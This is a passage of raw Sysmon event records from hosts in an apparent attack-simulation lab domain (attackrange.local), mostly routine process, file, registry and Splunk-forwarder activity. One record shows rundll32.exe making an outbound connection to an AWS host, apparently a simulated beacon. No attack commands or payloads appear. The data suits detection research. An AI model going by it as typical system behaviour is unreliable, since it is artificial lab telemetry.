17:30:06.039{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060985Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:06.039{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001060993Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:07.978{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57FC93E748E7BC620CCCB92F0E2FE252,SHA256=45C53379E5D5FFDB7E898A03961624B3CEADF1500636E7FF30385E2EFD43177E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001529853Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:07.629{21761711-3770-607F-F339-00000000BB01}6452WIN-HOST-5\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6452.xml~RFb312bf2.TMPMD5=FABC111312CD43093B0ECB217784AE61,SHA256=E4C54946B4732E720A02A0F783874B6D71E92ED837209F7EBDA4D14779023557falsefalse - insufficient disk space 11241100x80000000000000001529852Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:07.629{21761711-3770-607F-F339-00000000BB01}6452C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6452.xml~RFb312bf2.TMP2021-04-21 17:30:07.629 254200x80000000000000001529851Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:07.629{21761711-3770-607F-F339-00000000BB01}6452C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\o3tvoopf.tmp2021-04-20 20:22:02.3742021-04-21 17:30:07.629 11241100x80000000000000001529850Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:07.629{21761711-3770-607F-F339-00000000BB01}6452C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\o3tvoopf.tmp2021-04-21 17:30:07.629 11241100x80000000000000001529849Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:07.567{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001529848Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:07.567{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F9D8544E385AB1FB610B5B5713733D,SHA256=317BD102556CACCE138E0B1579A5865A5B73C71355CCD8B27C2A4DB7EADC236Afalsefalse - insufficient disk space 354300x80000000000000001060992Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:02.927{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1294-false10.0.1.12-8000- 23542300x80000000000000001060991Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:07.338{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B25D2F96AAD1D37E2E9B5BC56D89F94,SHA256=86945E2BDE546E87F34BE55D3118C8EEF7B69C3A64FEB5C4F7B633E09D2AD2DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060990Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:07.337{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24242E288AA9DA9FF63FA7110196DB08,SHA256=E2DD361BBE5B0FEACECDF11C63372C8E35A7D9D7292627859C082565626A0456,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060989Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:07.040{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060988Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:07.040{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001529847Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:05.263{21761711-ED8A-607D-B212-00000000BB01}7572C:\Windows\SysWOW64\rundll32.exeWIN-HOST-5\Administratortcptruefalse10.0.1.15win-host-5.attackrange.local64678-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x80000000000000001061010Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.987{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B2CF753DA59A862AACAD56023532DF6,SHA256=7261F1114D53E1D69B42CDAE80F0AC3AB628F689CF0037CEEE42BB98BE42F0A4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530344Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.851{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530343Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.851{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3E1978AFAD0C28652AB93D44484F2D6,SHA256=60ACA186842908E48418EEDFB463AB3C5998CBC4742963C45D7C645267D6AF1Ffalsefalse - insufficient disk space 13241300x80000000000000001530342Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.832{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000804FC\VirtualDesktopBinary Data 12241200x80000000000000001530341Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.832{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000804FC 534500x80000000000000001530340Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exe 10341000x80000000000000001530339Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530338Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001530337Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 12241200x80000000000000001530336Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-DeleteKey2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000804FC 13241300x80000000000000001530335Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530334Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkrBinary Data 10341000x80000000000000001530333Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530332Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 534500x80000000000000001530331Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 734700x80000000000000001530330Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 11241100x80000000000000001530329Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive2021-04-19 12:25:39.286 23542300x80000000000000001530328Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-6120-6080-BB5D-00000000BB01}388WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CFfalsefalse - insufficient disk space 10341000x80000000000000001061009Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.492{761B69BB-818C-607D-0D00-00000000BA01}9046376C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2900-00000000BA01}2920C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061008Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.492{761B69BB-818C-607D-0D00-00000000BA01}9046376C:\Windows\system32\svchost.exe{761B69BB-A4A5-607D-9A08-00000000BA01}6816C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061007Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.492{761B69BB-818C-607D-0D00-00000000BA01}9046376C:\Windows\system32\svchost.exe{761B69BB-A4A5-607D-9A08-00000000BA01}6816C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061006Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.217{761B69BB-84D3-607D-0403-00000000BA01}3723268C:\Windows\Explorer.EXE{761B69BB-A4A5-607D-9A08-00000000BA01}6816C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55a30|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF803D54D48C8)|UNKNOWN(FFFFF288E7234A38)|UNKNOWN(FFFFF288E7234BB7)|UNKNOWN(FFFFF288E722F241)|UNKNOWN(FFFFF288E7230C0A)|UNKNOWN(FFFFF288E722EEC6)|UNKNOWN(FFFFF803D51EBE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000001061005Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.217{761B69BB-84D3-607D-0403-00000000BA01}3723268C:\Windows\Explorer.EXE{761B69BB-A4A5-607D-9A08-00000000BA01}6816C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+55511|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF803D54D48C8)|UNKNOWN(FFFFF288E7234A38)|UNKNOWN(FFFFF288E7234BB7)|UNKNOWN(FFFFF288E722F241)|UNKNOWN(FFFFF288E7230C0A)|UNKNOWN(FFFFF288E722EEC6)|UNKNOWN(FFFFF803D51EBE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061004Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.217{761B69BB-A4A5-607D-9A08-00000000BA01}6816ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFb396069.TMPMD5=95E355D75CB9B0A6D076CE414DF2B1F4,SHA256=0C9CCEB014A154B30949E1761541EBBD3B0FC9CC2554B5C0868A7F1CDB481C51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061003Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.082{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-6120-6080-945C-00000000BA01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061002Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.081{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061001Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.080{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061000Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.080{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060999Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.080{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060998Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.080{761B69BB-818A-607D-0500-00000000BA01}4083000C:\Windows\system32\csrss.exe{761B69BB-6120-6080-945C-00000000BA01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001060997Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.080{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-6120-6080-945C-00000000BA01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 